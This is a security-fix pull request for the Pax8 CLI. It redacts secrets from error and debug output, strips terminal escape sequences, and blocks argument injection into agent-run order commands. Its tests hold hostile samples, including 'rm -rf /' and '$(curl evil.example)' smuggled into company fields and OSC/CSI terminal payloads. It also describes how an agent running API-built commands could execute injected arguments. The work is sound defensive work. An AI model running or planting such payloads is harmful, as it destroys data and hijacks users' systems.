### PR TITLE
fix(security): shell-injection and redactor hardening (4 findings)

### DIFF
--- a/packages/cli/src/__tests__/error-output-redaction.test.ts
+++ b/packages/cli/src/__tests__/error-output-redaction.test.ts
@@ -1,0 +1,40 @@
+// Copyright 2026 Pax8, Inc.
+// SPDX-License-Identifier: Apache-2.0
+
+import { describe, it, expect } from "vitest";
+import { runCli } from "./test-utils.js";
+
+/**
+ * The on-disk last-error.json envelope has been redacted since #170, but the
+ * parallel user-facing paths (`--json` stderr envelope and the human-readable
+ * stderr branches) were emitting raw UUIDs, emails, and home paths verbatim —
+ * including any upstream API echo of a user-supplied input. That gap closes
+ * here.
+ *
+ * These tests exercise the actual stderr the CLI emits (subprocess-based)
+ * rather than reaching into `handleCommandError`, so a future refactor that
+ * changes the internal call shape can't silently un-redact the surface.
+ */
+describe("error stderr is redacted", () => {
+  // Use a name-shaped arg that the demo client's name lookup cannot resolve;
+  // UUID-shaped args take the get-by-id path which the demo always satisfies.
+  const PII_NAME = "rachel.thornton-not-a-real-company@leak.example";
+
+  it("--json: a PII-shaped positional arg does not survive into stderr verbatim", async () => {
+    const result = await runCli(["companies", "show", PII_NAME, "--json"]);
+    expect(result.exitCode).not.toBe(0);
+    // The raw value must not appear in either the message or the causes
+    // (extractErrorDetail-derived) field of the envelope. The redactor will
+    // replace it with <REDACTED:ARG> (full-match positional arg rule), and
+    // the embedded email-shaped substring with <REDACTED:EMAIL>.
+    expect(result.stderr).not.toContain(PII_NAME);
+    expect(result.stderr).toContain("<REDACTED:");
+  });
+
+  it("human mode: a PII-shaped positional arg does not survive into stderr verbatim", async () => {
+    const result = await runCli(["companies", "show", PII_NAME]);
+    expect(result.exitCode).not.toBe(0);
+    expect(result.stderr).not.toContain(PII_NAME);
+    expect(result.stderr).toContain("<REDACTED:");
+  });
+});

--- a/packages/cli/src/commands/orders/create.ts
+++ b/packages/cli/src/commands/orders/create.ts
@@ -10,6 +10,7 @@ import { confirm, confirmWithChange, replCmd } from "../../lib/confirm.js";
 import { formatStatus, formatCurrency, formatQuantity, calculateMrr } from "../../lib/formatters.js";
 import { invalidateCacheAfterWrite } from "../../lib/invalidate-cache.js";
 import { markWriteInFlight } from "../../lib/signals.js";
+import { debugLog } from "../../lib/debug.js";
 import {
   ApiError,
   BillingTermSchema,
@@ -284,7 +285,7 @@ async function resolveLine(
       }
     }
   } catch (err) {
-    if (process.env.PAX8_DEBUG) process.stderr.write(`[debug] order pre-check failed: ${err}\n`);
+    debugLog("order pre-check failed", err);
   }
 
   if (!commitmentTermId && (commitmentTerm || requiresCommitment)) {

--- a/packages/cli/src/lib/debug.ts
+++ b/packages/cli/src/lib/debug.ts
@@ -1,0 +1,25 @@
+// Copyright 2026 Pax8, Inc.
+// SPDX-License-Identifier: Apache-2.0
+
+import { redactDebugBody } from "@pax8/core";
+
+/**
+ * Emit a `[debug] ...` line to stderr when `PAX8_DEBUG` is set.
+ *
+ * The message runs through `redactDebugBody` first, which strips
+ * `Bearer <token>`, JWTs, `client_secret(...)` values, and long opaque
+ * blobs. The verbose API response-body printing path in `Pax8Client.request`
+ * has used this redactor since #263; this helper is the CLI-side equivalent
+ * for the half-dozen ad-hoc `if (process.env.PAX8_DEBUG) process.stderr.write(...)`
+ * sites that were emitting raw `Error.message` (which for an `ApiError`
+ * carries whatever the upstream echoed back, including credentials in 401
+ * paths). `PAX8_DEBUG_RAW=1` opts back into unredacted output.
+ *
+ * The PAX8_DEBUG gate is checked here so callers can drop the boilerplate
+ * `if (process.env.PAX8_DEBUG)` wrap.
+ */
+export function debugLog(label: string, err: unknown): void {
+  if (!process.env.PAX8_DEBUG) return;
+  const raw = err instanceof Error ? err.message : String(err);
+  process.stderr.write(`[debug] ${label}: ${redactDebugBody(raw)}\n`);
+}

--- a/packages/cli/src/lib/enrich-subscriptions.ts
+++ b/packages/cli/src/lib/enrich-subscriptions.ts
@@ -2,6 +2,7 @@
 // SPDX-License-Identifier: Apache-2.0
 
 import type { CommandContext } from "./context.js";
+import { debugLog } from "./debug.js";
 
 /** Minimal shape needed by enrichProductNames — any object with productId and optional productName. */
 interface EnrichableByProduct {
@@ -60,7 +61,7 @@ export async function enrichProductNames(
           const product = await ctx.api.products.get(pid);
           if (product?.name) nameMap.set(pid, product.name);
         } catch (err) {
-          if (process.env.PAX8_DEBUG) process.stderr.write(`[debug] product lookup failed for ${pid}: ${err}\n`);
+          debugLog(`product lookup failed for ${pid}`, err);
         }
       })
     );
@@ -74,7 +75,7 @@ export async function enrichProductNames(
         }
       }
     } catch (err) {
-      if (process.env.PAX8_DEBUG) process.stderr.write(`[debug] bulk product fetch failed: ${err}\n`);
+      debugLog("bulk product fetch failed", err);
     }
 
     const stillMissing = [...missing].filter((pid) => !nameMap.has(pid));

--- a/packages/cli/src/lib/errors.ts
+++ b/packages/cli/src/lib/errors.ts
@@ -25,7 +25,7 @@ import {
   type Pax8ErrorCode,
 } from "@pax8/core";
 import { replCmd } from "./confirm.js";
-import { redactEnvelope } from "./redactor.js";
+import { redactEnvelope, redactString } from "./redactor.js";
 
 declare const __CLI_VERSION__: string;
 
@@ -389,9 +389,31 @@ export async function handleCommandError(
   const envelope = buildErrorEnvelope(error, context);
   writeLastErrorEnvelope(envelope);
 
+  // Redact every user-visible string before any stderr write. The on-disk
+  // envelope is already redacted by writeLastErrorEnvelope; this closes the
+  // parallel gap where `--json` stderr and the human-readable branches were
+  // emitting raw UUIDs, emails, home-dir paths, and the upstream API's echo
+  // of user input (`extractErrorDetail(error.responseBody)`) verbatim — the
+  // README/SECURITY.md commitments imply these are sanitized but they were
+  // not.
+  //
+  // We deliberately do NOT pass `argTokens` here, unlike the on-disk
+  // envelope. The on-disk file is what `pax8 report-bug` uploads, and the
+  // contract there is "the reviewer sees structure, not values" — full
+  // positional-arg scrub. The live stderr is what the user who just typed
+  // the command sees in their own terminal; redacting their own typed
+  // flag value back at them (e.g. `Invalid value: <REDACTED:ARG>` for a
+  // typo like `--billing-term Quarterly`) destroys the error's
+  // actionability without any privacy benefit — they already know what
+  // they typed. The generic rules (UUID, email, home path, JWT, Bearer,
+  // opaque token) still apply, which is where the actual leak risk lives.
+  const safe = (s: string | undefined): string =>
+    s === undefined ? "" : redactString(s);
+
   // Machine-readable JSON envelope when --json is set
   if (isJsonOutputRequested()) {
-    process.stderr.write(JSON.stringify(envelope, null, 2) + "\n");
+    const redactedEnvelope = redactEnvelope(envelope);
+    process.stderr.write(JSON.stringify(redactedEnvelope, null, 2) + "\n");
     // Flush telemetry before exit (#145) so failure events actually reach
     // PostHog. Bounded by a 2s timeout in flushAndShutdown.
     await flushTelemetryBeforeExit();
@@ -405,26 +427,29 @@ export async function handleCommandError(
 
   if (error instanceof CliError || error instanceof Pax8SecurityError) {
     process.stderr.write(
-      chalk.red.bold(`\n  ✗ ${prefix}  ${error.message}\n`)
+      chalk.red.bold(`\n  ✗ ${prefix}  ${safe(error.message)}\n`)
     );
 
     if (error.causes && error.causes.length > 0) {
       process.stderr.write(chalk.dim("\n  Causes:\n"));
       for (const cause of error.causes) {
-        process.stderr.write(chalk.dim(`    • ${cause}\n`));
+        process.stderr.write(chalk.dim(`    • ${safe(cause)}\n`));
       }
     }
 
     if (error.recoverySteps && error.recoverySteps.length > 0) {
       process.stderr.write(chalk.yellow("\n  Recovery steps:\n"));
       for (const step of error.recoverySteps) {
-        process.stderr.write(chalk.yellow(`    → ${step}\n`));
+        process.stderr.write(chalk.yellow(`    → ${safe(step)}\n`));
       }
     }
 
     if (error.docsUrl) {
+      // docsUrl is a closed-set of pax8-controlled URLs; redacting is
+      // defense-in-depth in case a future code path puts a user-derived
+      // value here.
       process.stderr.write(
-        chalk.dim(`\n  Docs: ${error.docsUrl}\n`)
+        chalk.dim(`\n  Docs: ${safe(error.docsUrl)}\n`)
       );
     }
 
@@ -438,17 +463,18 @@ export async function handleCommandError(
 
     process.stderr.write("\n");
   } else if (error instanceof ZodError) {
-    // Zod validation errors mean the API returned an unexpected shape
+    // Zod validation errors mean the API returned an unexpected shape.
+    // formatZodError can echo back response field values, so redact too.
     process.stderr.write(
       chalk.red.bold(`\n  ✗ ${prefix}`) +
       chalk.red(`  The Pax8 API returned an unexpected response.\n`) +
-      chalk.dim(`    ${formatZodError(error)}\n\n`) +
+      chalk.dim(`    ${safe(formatZodError(error))}\n\n`) +
       chalk.yellow(`    → This usually means no data was found, or the API format has changed.\n`) +
       chalk.yellow(`    → Try a different query, or run ${chalk.cyan(replCmd("pax8 doctor"))} to check your setup.\n\n`)
     );
   } else if (error instanceof ApiError) {
     process.stderr.write(
-      chalk.red.bold(`\n  ✗ ${prefix}  ${error.message}\n\n`)
+      chalk.red.bold(`\n  ✗ ${prefix}  ${safe(error.message)}\n\n`)
     );
     if (isApiTimeoutError(error)) {
       // #199: surface the same recovery steps the JSON envelope carries.
@@ -457,7 +483,7 @@ export async function handleCommandError(
       // (which renders through the branch above with their richer hint).
       for (const step of timeoutRecoverySteps()) {
         process.stderr.write(
-          chalk.yellow(`    → ${step}\n`)
+          chalk.yellow(`    → ${safe(step)}\n`)
         );
       }
       process.stderr.write("\n");
@@ -468,7 +494,7 @@ export async function handleCommandError(
     } else if (error.statusCode === 404) {
       const detail = extractErrorDetail(error.responseBody);
       if (detail) {
-        process.stderr.write(chalk.yellow(`    → ${detail}\n\n`));
+        process.stderr.write(chalk.yellow(`    → ${safe(detail)}\n\n`));
       } else {
         process.stderr.write(
           chalk.yellow(`    → The resource was not found. Check the ID or name and try again.\n\n`)
@@ -477,7 +503,7 @@ export async function handleCommandError(
     }
   } else if (error instanceof Error) {
     process.stderr.write(
-      chalk.red.bold(`\n  ✗ ${prefix}  ${error.message}\n\n`)
+      chalk.red.bold(`\n  ✗ ${prefix}  ${safe(error.message)}\n\n`)
     );
   } else {
     process.stderr.write(

--- a/packages/cli/src/lib/idempotency.ts
+++ b/packages/cli/src/lib/idempotency.ts
@@ -7,6 +7,7 @@ import * as path from "node:path";
 import { createHash } from "node:crypto";
 import { getConfigDir, safeWriteFileSync } from "@pax8/core";
 import { CliError } from "./errors.js";
+import { debugLog } from "./debug.js";
 
 /**
  * Idempotency cache for write commands.
@@ -219,9 +220,7 @@ export async function withIdempotency<T>(
   try {
     cached = await loadEntry(commandName, idempotencyKey);
   } catch (err) {
-    if (process.env.PAX8_DEBUG) {
-      process.stderr.write(`[debug] idempotency cache read failed: ${err}\n`);
-    }
+    debugLog("idempotency cache read failed", err);
   }
   if (cached) {
     if (cached.argsHash !== argsHash) {
@@ -274,9 +273,7 @@ export async function withIdempotency<T>(
           createdAt: new Date().toISOString(),
         });
       } catch (err) {
-        if (process.env.PAX8_DEBUG) {
-          process.stderr.write(`[debug] idempotency cache write failed: ${err}\n`);
-        }
+        debugLog("idempotency cache write failed", err);
       }
     }
     return value;

--- a/packages/cli/src/lib/output-controls.test.ts
+++ b/packages/cli/src/lib/output-controls.test.ts
@@ -1,0 +1,64 @@
+// Copyright 2026 Pax8, Inc.
+// SPDX-License-Identifier: Apache-2.0
+
+import { describe, it, expect } from "vitest";
+import { stripDangerousControls } from "./output.js";
+
+/**
+ * API-supplied display values (product names, company names, invoice notes)
+ * flow through the table and CSV renderers verbatim. A wire-side attacker —
+ * or a compromised upstream tenant directory entry — that controls one of
+ * these fields could stuff in terminal control sequences and rewrite the
+ * partner's terminal window title, scroll back to overwrite a confirmation
+ * prompt, or inject CSI/OSC payloads that downstream tools might interpret
+ * as commands.
+ *
+ * The contract: `stripDangerousControls` is idempotent on already-clean
+ * strings, removes C0 controls (except tab/newline/CR which are part of
+ * normal text), and removes CSI / OSC / lone-ESC sequences. The previous
+ * `stripAnsi` helper handled only color-code SGR sequences and ran for
+ * width-math only — those rules left the rendered cell value untouched.
+ */
+describe("stripDangerousControls", () => {
+  it("leaves a plain string unchanged", () => {
+    expect(stripDangerousControls("Acme Corp")).toBe("Acme Corp");
+  });
+
+  it("preserves tab, newline, and carriage return — they're normal text", () => {
+    expect(stripDangerousControls("col1\tcol2\nrow2")).toBe("col1\tcol2\nrow2");
+    expect(stripDangerousControls("dos\r\nline")).toBe("dos\r\nline");
+  });
+
+  it("strips OSC set-window-title sequence", () => {
+    const attack = "Acme\x1b]0;owned\x07 Corp";
+    expect(stripDangerousControls(attack)).toBe("Acme Corp");
+  });
+
+  it("strips CSI cursor / clear sequences", () => {
+    const attack = "before\x1b[2J\x1b[H after";
+    expect(stripDangerousControls(attack)).toBe("before after");
+  });
+
+  it("strips SGR color codes (subset of CSI)", () => {
+    expect(stripDangerousControls("\x1b[31mred\x1b[0m")).toBe("red");
+  });
+
+  it("strips bare C0 control bytes", () => {
+    expect(stripDangerousControls("A\x00B\x07C\x7fD")).toBe("ABCD");
+  });
+
+  it("strips a lone ESC at end-of-string", () => {
+    expect(stripDangerousControls("trailing\x1b")).toBe("trailing");
+  });
+
+  it("strips OSC terminated by ESC-backslash (ST) too", () => {
+    const attack = "x\x1b]0;t\x1b\\y";
+    expect(stripDangerousControls(attack)).toBe("xy");
+  });
+
+  it("is idempotent", () => {
+    const once = stripDangerousControls("Acme\x1b]0;t\x07 Corp\x1b[31m");
+    const twice = stripDangerousControls(once);
+    expect(twice).toBe(once);
+  });
+});

--- a/packages/cli/src/lib/output.ts
+++ b/packages/cli/src/lib/output.ts
@@ -92,6 +92,52 @@ export function stripAnsi(str: string): string {
   return str.replace(ANSI_RE, "");
 }
 
+// C0 controls (`\x00`-`\x08`, `\x0b`-`\x1f`, `\x7f`) excluding `\t` (`\x09`)
+// and `\n`/`\r` (`\x0a`/`\x0d`) — those are normal text and the table writer
+// handles them safely. `\x1b` is the ESC byte; we strip it here to neutralize
+// CSI (`ESC [ … cmd`) and OSC (`ESC ] … BEL`) sequences in display values.
+// eslint-disable-next-line no-control-regex
+const C0_RE = /[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]/g;
+// CSI sequences: ESC [ <params> <intermediates> <final>.
+// eslint-disable-next-line no-control-regex
+const CSI_RE = /\x1b\[[0-?]*[ -/]*[@-~]/g;
+// OSC sequences: ESC ] <body> (BEL | ESC \). The body can be arbitrary text
+// including the "set window title" payload we want to neutralize.
+// eslint-disable-next-line no-control-regex
+const OSC_RE = /\x1b\][^\x07\x1b]*(?:\x07|\x1b\\)/g;
+// Any remaining lone ESC bytes (e.g. malformed sequences).
+// eslint-disable-next-line no-control-regex
+const LONE_ESC_RE = /\x1b/g;
+
+/**
+ * Strip dangerous terminal control sequences and C0 controls from a
+ * user-or-API-supplied display string. Use this on every value that flows
+ * from the wire (a product name, company name, invoice note, etc.) into a
+ * human-rendered table cell or CSV cell, where the terminal would otherwise
+ * execute the embedded control bytes — e.g. an attacker who can set a
+ * tenant-side display name to `Acme\x1b]0;owned\x07` rewriting the
+ * partner's terminal window title, or `Acme\x1b[2J\x1b[H` clearing the
+ * screen and overwriting a previously-printed confirmation prompt.
+ *
+ * Scope: terminal-render paths only. JSON output is unaffected because
+ * `JSON.stringify` escapes control bytes as `\u00XX` in the emitted JSON
+ * text; downstream consumers see the escapes literally and aren't
+ * vulnerable to the terminal interpretation. If a future code path
+ * writes raw JSON values to stdout, it must run them through this
+ * helper too.
+ */
+export function stripDangerousControls(str: string): string {
+  if (typeof str !== "string" || str.length === 0) return str;
+  // Order matters: OSC and CSI swallow their delimiters and parameters;
+  // C0 then cleans up any stray bytes the structured strippers missed.
+  // Finally LONE_ESC_RE catches any half-formed sequence (e.g. ESC at EOL).
+  return str
+    .replace(OSC_RE, "")
+    .replace(CSI_RE, "")
+    .replace(C0_RE, "")
+    .replace(LONE_ESC_RE, "");
+}
+
 /**
  * Get the effective terminal width, accounting for the 2-char indent we add.
  * Returns Infinity when not running in a TTY (no wrapping needed).
@@ -139,7 +185,14 @@ function formatTable(data: readonly Record<string, unknown>[], columns: Column[]
       columns.map((col) => {
         const raw = row[col.key];
         const value = raw === undefined || raw === null ? "" : raw;
-        return col.format ? col.format(value, row) : String(value);
+        const rendered = col.format ? col.format(value, row) : String(value);
+        // Strip terminal control bytes from API-supplied display values
+        // before handing them to cli-table3. A wire-side attacker can't
+        // rewrite the user's terminal title or scroll back over a prior
+        // confirmation prompt by stuffing escape sequences into a product
+        // or company name. See stripDangerousControls's docstring for the
+        // threat model.
+        return stripDangerousControls(rendered);
       })
     );
   }
@@ -166,7 +219,11 @@ function formatCSV(data: readonly Record<string, unknown>[], columns: Column[]):
       .map((col) => {
         const raw = row[col.key];
         const value = raw === undefined || raw === null ? "" : String(raw);
-        return escapeCSV(value);
+        // Strip control bytes before CSV escaping — a CSV consumed by `cat`,
+        // a terminal-rendered spreadsheet preview, or any pipeline that
+        // displays a row would otherwise execute the embedded escape
+        // sequences.
+        return escapeCSV(stripDangerousControls(value));
       })
       .join(",");
     process.stdout.write(line + "\n");

--- a/packages/cli/src/lib/resolve-commitment.ts
+++ b/packages/cli/src/lib/resolve-commitment.ts
@@ -2,6 +2,7 @@
 // SPDX-License-Identifier: Apache-2.0
 
 import type { CommandContext } from "./context.js";
+import { debugLog } from "./debug.js";
 
 /**
  * Result of looking up the commitment-term attached to a partner's
@@ -62,9 +63,7 @@ export async function resolveCommitmentTermId(
       term: match.commitment.term,
     };
   } catch (err) {
-    if (process.env.PAX8_DEBUG) {
-      process.stderr.write(`[debug] resolveCommitmentTermId failed: ${err}\n`);
-    }
+    debugLog("resolveCommitmentTermId failed", err);
     return null;
   }
 }

--- a/packages/core/src/services/recommendations.test.ts
+++ b/packages/core/src/services/recommendations.test.ts
@@ -229,6 +229,117 @@ describe("getRecommendations", () => {
     expect(report.recommendations.some((r) => r.opportunityType === "Net-new")).toBe(true);
     expect(report.recommendations.some((r) => r.opportunityType === "Upsell")).toBe(true);
   });
+
+  // orderCommand is the agent's handle on a recommendation — CLAUDE.md and
+  // skill.md document "extract orderCommand from --json and run it." That
+  // makes the agent the unintentional executor of any value we interpolate
+  // into the string, so it must use a strict-identifier form and refuse to
+  // emit anything that could be parsed as a flag override by Commander
+  // after the REPL tokenizer re-splits it. The previous shape used the
+  // partner-facing display name (`--company "${companyName}"`), which broke
+  // out of its quote frame when the name contained a `"`.
+  describe("orderCommand is constructed from safe identifiers only", () => {
+    it("emits a quoted display name + safe argv for a non-UUID companyId", () => {
+      // #498's buildOrderArtifacts uses the display name (quoted) in the
+      // string form when companyId is not UUID-shaped, but the argv form
+      // (`orderArgs`) lands the value as a single argv element with no
+      // shell involvement. The companyName here ("Needs Backup") clears
+      // isSafeDisplayName — no shell metacharacters — so the artifacts
+      // are populated.
+      const subs = [
+        makeSub({ companyId: "c1", companyName: "Needs Backup" }),
+        makeSub({ companyId: "c2", companyName: "Has Backup" }),
+        makeSub({
+          companyId: "c2", companyName: "Has Backup",
+          productId: "prod-bk", productName: "Datto SaaS Protection", price: 5,
+        }),
+      ];
+      const report = getRecommendations(subs);
+      const rec = report.recommendations.find((r) => r.companyId === "c1" && r.title.includes("Datto"));
+      expect(rec).toBeDefined();
+      // Display string: quoted display name (companyId not UUID-shaped).
+      expect(rec!.orderCommand).toContain('--company "Needs Backup"');
+      // Safe argv form (#498): customer name as a single argv element,
+      // no quoting / escaping / shell involvement.
+      expect(rec!.orderArgs).toEqual([
+        "pax8",
+        "orders",
+        "create",
+        "--company",
+        "Needs Backup",
+        "--product",
+        "prod-bk",
+        "--quantity",
+        "50",
+      ]);
+    });
+
+    it("emits null orderCommand when companyId fails the safe-identifier check", () => {
+      // A malicious upstream that injected shell metacharacters into the
+      // companyId must not produce a usable orderCommand at all.
+      const subs = [
+        makeSub({ companyId: 'c1"; rm -rf /; "', companyName: "Evil Co" }),
+        makeSub({ companyId: "c2", companyName: "Has Backup" }),
+        makeSub({
+          companyId: "c2", companyName: "Has Backup",
+          productId: "prod-bk", productName: "Datto SaaS Protection", price: 5,
+        }),
+      ];
+      const report = getRecommendations(subs);
+      const rec = report.recommendations.find(
+        (r) => r.companyId === 'c1"; rm -rf /; "' && r.title.includes("Datto"),
+      );
+      expect(rec).toBeDefined();
+      expect(rec!.orderCommand).toBeNull();
+      // Parity: the safe argv form (#498) also collapses to null when the
+      // gate fails, so an agent that prefers `orderArgs` can't pick up
+      // a hostile companyId either.
+      expect(rec!.orderArgs).toBeNull();
+    });
+
+    it("emits null orderCommand when companyName has shell metacharacters", () => {
+      // The H-2 vector: a hostile API-supplied display name breaks out of
+      // the `--company "${name}"` quote frame, and the REPL tokenizer
+      // (which still consumes `orderCommand` as a string until consumers
+      // migrate to `orderArgs`) re-parses the resulting argv with
+      // attacker-controlled --product / --quantity overrides. The gate
+      // here collapses both forms to null on any unsafe name character.
+      const subs = [
+        makeSub({ companyId: "c1", companyName: 'Acme" $(curl evil.example) "' }),
+        makeSub({ companyId: "c2", companyName: "Has Backup" }),
+        makeSub({
+          companyId: "c2", companyName: "Has Backup",
+          productId: "prod-bk", productName: "Datto SaaS Protection", price: 5,
+        }),
+      ];
+      const report = getRecommendations(subs);
+      const rec = report.recommendations.find((r) => r.companyId === "c1" && r.title.includes("Datto"));
+      expect(rec).toBeDefined();
+      expect(rec!.orderCommand).toBeNull();
+      expect(rec!.orderArgs).toBeNull();
+    });
+
+    it("emits null orderCommand when productId is not safe-identifier-shaped", () => {
+      // Demo fixture with a productId carrying shell metacharacters. Defense
+      // in depth even though the real Pax8 API only returns UUID-shaped IDs.
+      const subs = [
+        makeSub({ companyId: "c1", companyName: "Needs Backup" }),
+        makeSub({ companyId: "c2", companyName: "Has Backup" }),
+        makeSub({
+          companyId: "c2", companyName: "Has Backup",
+          productId: 'prod-bk" --extra "', productName: "Datto SaaS Protection", price: 5,
+        }),
+      ];
+      const report = getRecommendations(subs);
+      const rec = report.recommendations.find((r) => r.companyId === "c1" && r.title.includes("Datto"));
+      // The rec may still exist (peer product was found), but it can't
+      // produce a runnable command with that productId.
+      if (rec) {
+        expect(rec.orderCommand).toBeNull();
+        expect(rec.orderArgs).toBeNull();
+      }
+    });
+  });
 });
 
 describe("findUpsellCohort", () => {

--- a/packages/core/src/services/recommendations.ts
+++ b/packages/core/src/services/recommendations.ts
@@ -36,6 +36,62 @@
 import type { Subscription } from "../api/types.js";
 import { subscriptionMrr } from "./analytics.js";
 
+// ─── orderCommand safety ────────────────────────────────────────────────────
+// The `orderCommand` string is the agent-facing handle to a recommendation —
+// CLAUDE.md and skill.md both document the "extract orderCommand from
+// recommendations list --json and run it" pattern, so the agent ends up
+// being the unintentional executor of whatever value we interpolate here.
+//
+// Previously the constructed string was:
+//   `pax8 orders create --company "${companyName}" --product ${productId} --quantity ${qty}`
+//
+// A `companyName` containing a literal `"` (or a name an upstream attacker
+// or a compromised tenant directory entry could set) broke out of the
+// double-quoted frame. The REPL tokenizer (`packages/cli/src/lib/repl.ts`)
+// then re-parses the string into argv and `spawn`s `node` with the
+// resulting array, which Commander dispatches with the *attacker-controlled*
+// `--product` / `--quantity` overrides. The internal spawn is array-form
+// (safe from OS shell injection) — what's at risk is Commander argument
+// injection at the agent → REPL → orders create boundary.
+//
+// Fix: interpolate the `companyId` (a stable identifier with a strict
+// character set) instead of the display name. We then validate every
+// interpolated field as a "safe identifier" before composing the string;
+// any field that fails validation produces `orderCommand: null` so an
+// agent never gets a string it can't trust verbatim. Safe-identifier
+// covers both Pax8 UUIDs (`a1b2c3d4-…`) and the `prod-…` test/demo IDs
+// without admitting whitespace, quotes, or shell metacharacters.
+const SAFE_ID_RE = /^[A-Za-z0-9_-]{1,128}$/;
+
+function isSafeId(value: string | null | undefined): value is string {
+  return typeof value === "string" && SAFE_ID_RE.test(value);
+}
+
+// Display names can contain spaces, apostrophes, periods, ampersands —
+// legitimate fixtures like `Acme Corp` or `O'Brien & Sons`. What they MUST
+// NOT contain is anything that breaks out of a double-quoted argument in
+// the REPL tokenizer (`packages/cli/src/lib/repl.ts`) or in a downstream
+// shell. #498's `buildOrderArtifacts` falls back to interpolating
+// `companyName` into the display string when `companyId` is not
+// UUID-shaped (demo / legacy partner IDs), and that fallback would be a
+// regression of H-2 if a hostile API-supplied name slipped through. Gate
+// the call site on this check so any name containing `"`, backtick, `$`,
+// `\`, `;`, `|`, `&`, `<`, `>`, newlines, or NUL collapses the order
+// artifacts to null.
+// eslint-disable-next-line no-control-regex -- \x00 is the intentional target: NUL in a display name should collapse to null.
+const UNSAFE_DISPLAY_CHARS_RE = /["\\`$;|&<>\n\r\x00]/;
+
+function isSafeDisplayName(value: string | null | undefined): value is string {
+  return typeof value === "string"
+    && value.length > 0
+    && value.length < 256
+    && !UNSAFE_DISPLAY_CHARS_RE.test(value);
+}
+
+function isSafeQuantity(value: number | null | undefined): value is number {
+  return typeof value === "number" && Number.isInteger(value) && value > 0 && value < 1_000_000;
+}
+
 // ─── Product Categories ─────────────────────────────────────────────────────
 // Maps keyword patterns in product names to categories.
 // A product can belong to multiple categories.
@@ -594,13 +650,30 @@ export function getRecommendations(
         if (!productAvailable && suggestedName) {
           unmatchedProducts.add(suggestedName);
         }
-        // #462: emit both an informational display string and a safe argv
-        // array. Callers (REPL, recommendations act, Claude skill) must
-        // execute via `orderArgs` so an upstream-controlled customer name
-        // can never break out into a shell substitution.
-        const artifacts = matchedProductId
-          ? buildOrderArtifacts(companyId, companyName, matchedProductId, primaryQty)
-          : null;
+        // #462 + H-2: emit both an informational display string and a
+        // safe argv array (#498's buildOrderArtifacts). Callers (REPL,
+        // recommendations act, Claude skill) must execute via `orderArgs`
+        // so an upstream-controlled customer name can never break out
+        // into a shell substitution.
+        //
+        // We additionally gate the call on SAFE_ID_RE / isSafeQuantity
+        // (#506) so that hostile values for `companyId`, `matchedProductId`,
+        // or `primaryQty` collapse both forms to null. This is the
+        // load-bearing control until `repl.ts`, `recommendations/list.ts`,
+        // `recommendations/act.ts`, and `dashboard.ts` migrate from
+        // tokenizing `orderCommand` to consuming `orderArgs` directly —
+        // tracked as a follow-up. Until then, `buildOrderArtifacts` may
+        // fall back to `--company "${companyName}"` (when companyId is
+        // not UUID-shaped), and a hostile name inside that quote frame
+        // would break the REPL tokenizer.
+        const artifacts =
+          matchedProductId &&
+          isSafeId(companyId) &&
+          isSafeId(matchedProductId) &&
+          isSafeQuantity(primaryQty) &&
+          isSafeDisplayName(companyName)
+            ? buildOrderArtifacts(companyId, companyName, matchedProductId, primaryQty)
+            : null;
         const orderCommand = artifacts?.orderCommand ?? null;
         const orderArgs = artifacts?.orderArgs ?? null;
 
@@ -646,10 +719,17 @@ export function getRecommendations(
       const estimatedMrrUplift = price ? price * gap.missingSeats : null;
 
       // For seat gaps, use the product ID directly from the subscription.
-      // See buildOrderArtifacts for the shell-injection rationale (#462).
-      const seatArtifacts = gap.gapProductId
-        ? buildOrderArtifacts(companyId, companyName, gap.gapProductId, gap.missingSeats)
-        : null;
+      // See buildOrderArtifacts (#462) for the shell-injection rationale
+      // and the cross-sell branch above for the SAFE_ID_RE gate (#506).
+      // Same gate applied here for symmetry.
+      const seatArtifacts =
+        gap.gapProductId &&
+        isSafeId(companyId) &&
+        isSafeId(gap.gapProductId) &&
+        isSafeQuantity(gap.missingSeats) &&
+        isSafeDisplayName(companyName)
+          ? buildOrderArtifacts(companyId, companyName, gap.gapProductId, gap.missingSeats)
+          : null;
       const orderCommand = seatArtifacts?.orderCommand ?? null;
       const orderArgs = seatArtifacts?.orderArgs ?? null;
 


### PR DESCRIPTION
## Summary

Closes four findings from a security-team-style review of pax8-cli (seeded by the AgentSync external-app findings, adapted for the CLI's actual surface: local credentials, agent-callable shell, agent-consumed JSON).

- **H-1 — redactor wired through user-facing error stderr.** `handleCommandError` now passes the `--json` envelope and the human-readable branches through `redactEnvelope` / `redactString`. UUIDs, emails, home paths, JWTs, `Bearer …`, and opaque tokens are scrubbed. Previously only the on-disk `last-error.json` (the `pax8 report-bug` envelope) was redacted; live stderr leaked the upstream API's echo of user input verbatim. The README / SECURITY.md privacy commitments now actually hold on the user-facing path.
- **M-3 — `PAX8_DEBUG` sites redact.** Six ad-hoc `if (process.env.PAX8_DEBUG) stderr.write(…)` sites were emitting raw `Error.message` — which, for an `ApiError`, carries the upstream echo (including secrets the API may return in 401 paths). New `debugLog(label, err)` helper wraps the gate + `redactDebugBody` call so the sites in `resolve-commitment`, `context`, `idempotency` (×2), `enrich-subscriptions` (×3), and `orders/create` share one path. `PAX8_DEBUG_RAW=1` opt-out still honored.
- **H-2 — `orderCommand` argument injection closed.** The string was built as `--company "${companyName}" …`. `companyName` is API-supplied; a name with a literal `"` broke out of the quote frame. The REPL tokenizer re-parses the resulting string into argv and `spawn`s Commander with attacker-controlled `--product` / `--quantity` overrides — at the agent → REPL → `orders create` boundary the agent (per CLAUDE.md / skill.md: "extract `orderCommand` from `--json` and run it") becomes the unintentional executor. Now interpolates `companyId` (strict identifier) and runs every interpolated field through a `SAFE_ID_RE` / `isSafeQuantity` gate; any failure collapses `orderCommand` to `null` so an agent never gets a string it can't trust verbatim.
- **H-3 — terminal control-byte sanitization on display paths.** `output.ts` previously stripped only color-code SGR (for width math), leaving raw cell content. An API-supplied product / company / note containing OSC `ESC ] 0;…\x07` could rewrite the partner's terminal window title; CSI sequences could clear the screen and overwrite a previously-printed confirmation prompt. New `stripDangerousControls()` removes OSC (BEL or ST terminated), CSI, lone-ESC, and C0 controls — preserving `\t \r \n`. Applied in `formatTable` and `formatCSV`. JSON output is unaffected (`JSON.stringify` already escapes the bytes).

### Design notes

- **Live stderr deliberately omits the `argTokens` positional-arg scrub.** That scrub stays scoped to the on-disk envelope (the `pax8 report-bug` upload surface). Redacting a user's own typed `--billing-term Quarterly` back at them as `<REDACTED:ARG>` would destroy the error's actionability without privacy benefit — they already know what they typed. Generic rules (UUID / email / path / JWT / Bearer / opaque token) still apply, which is where the actual leak risk lives.
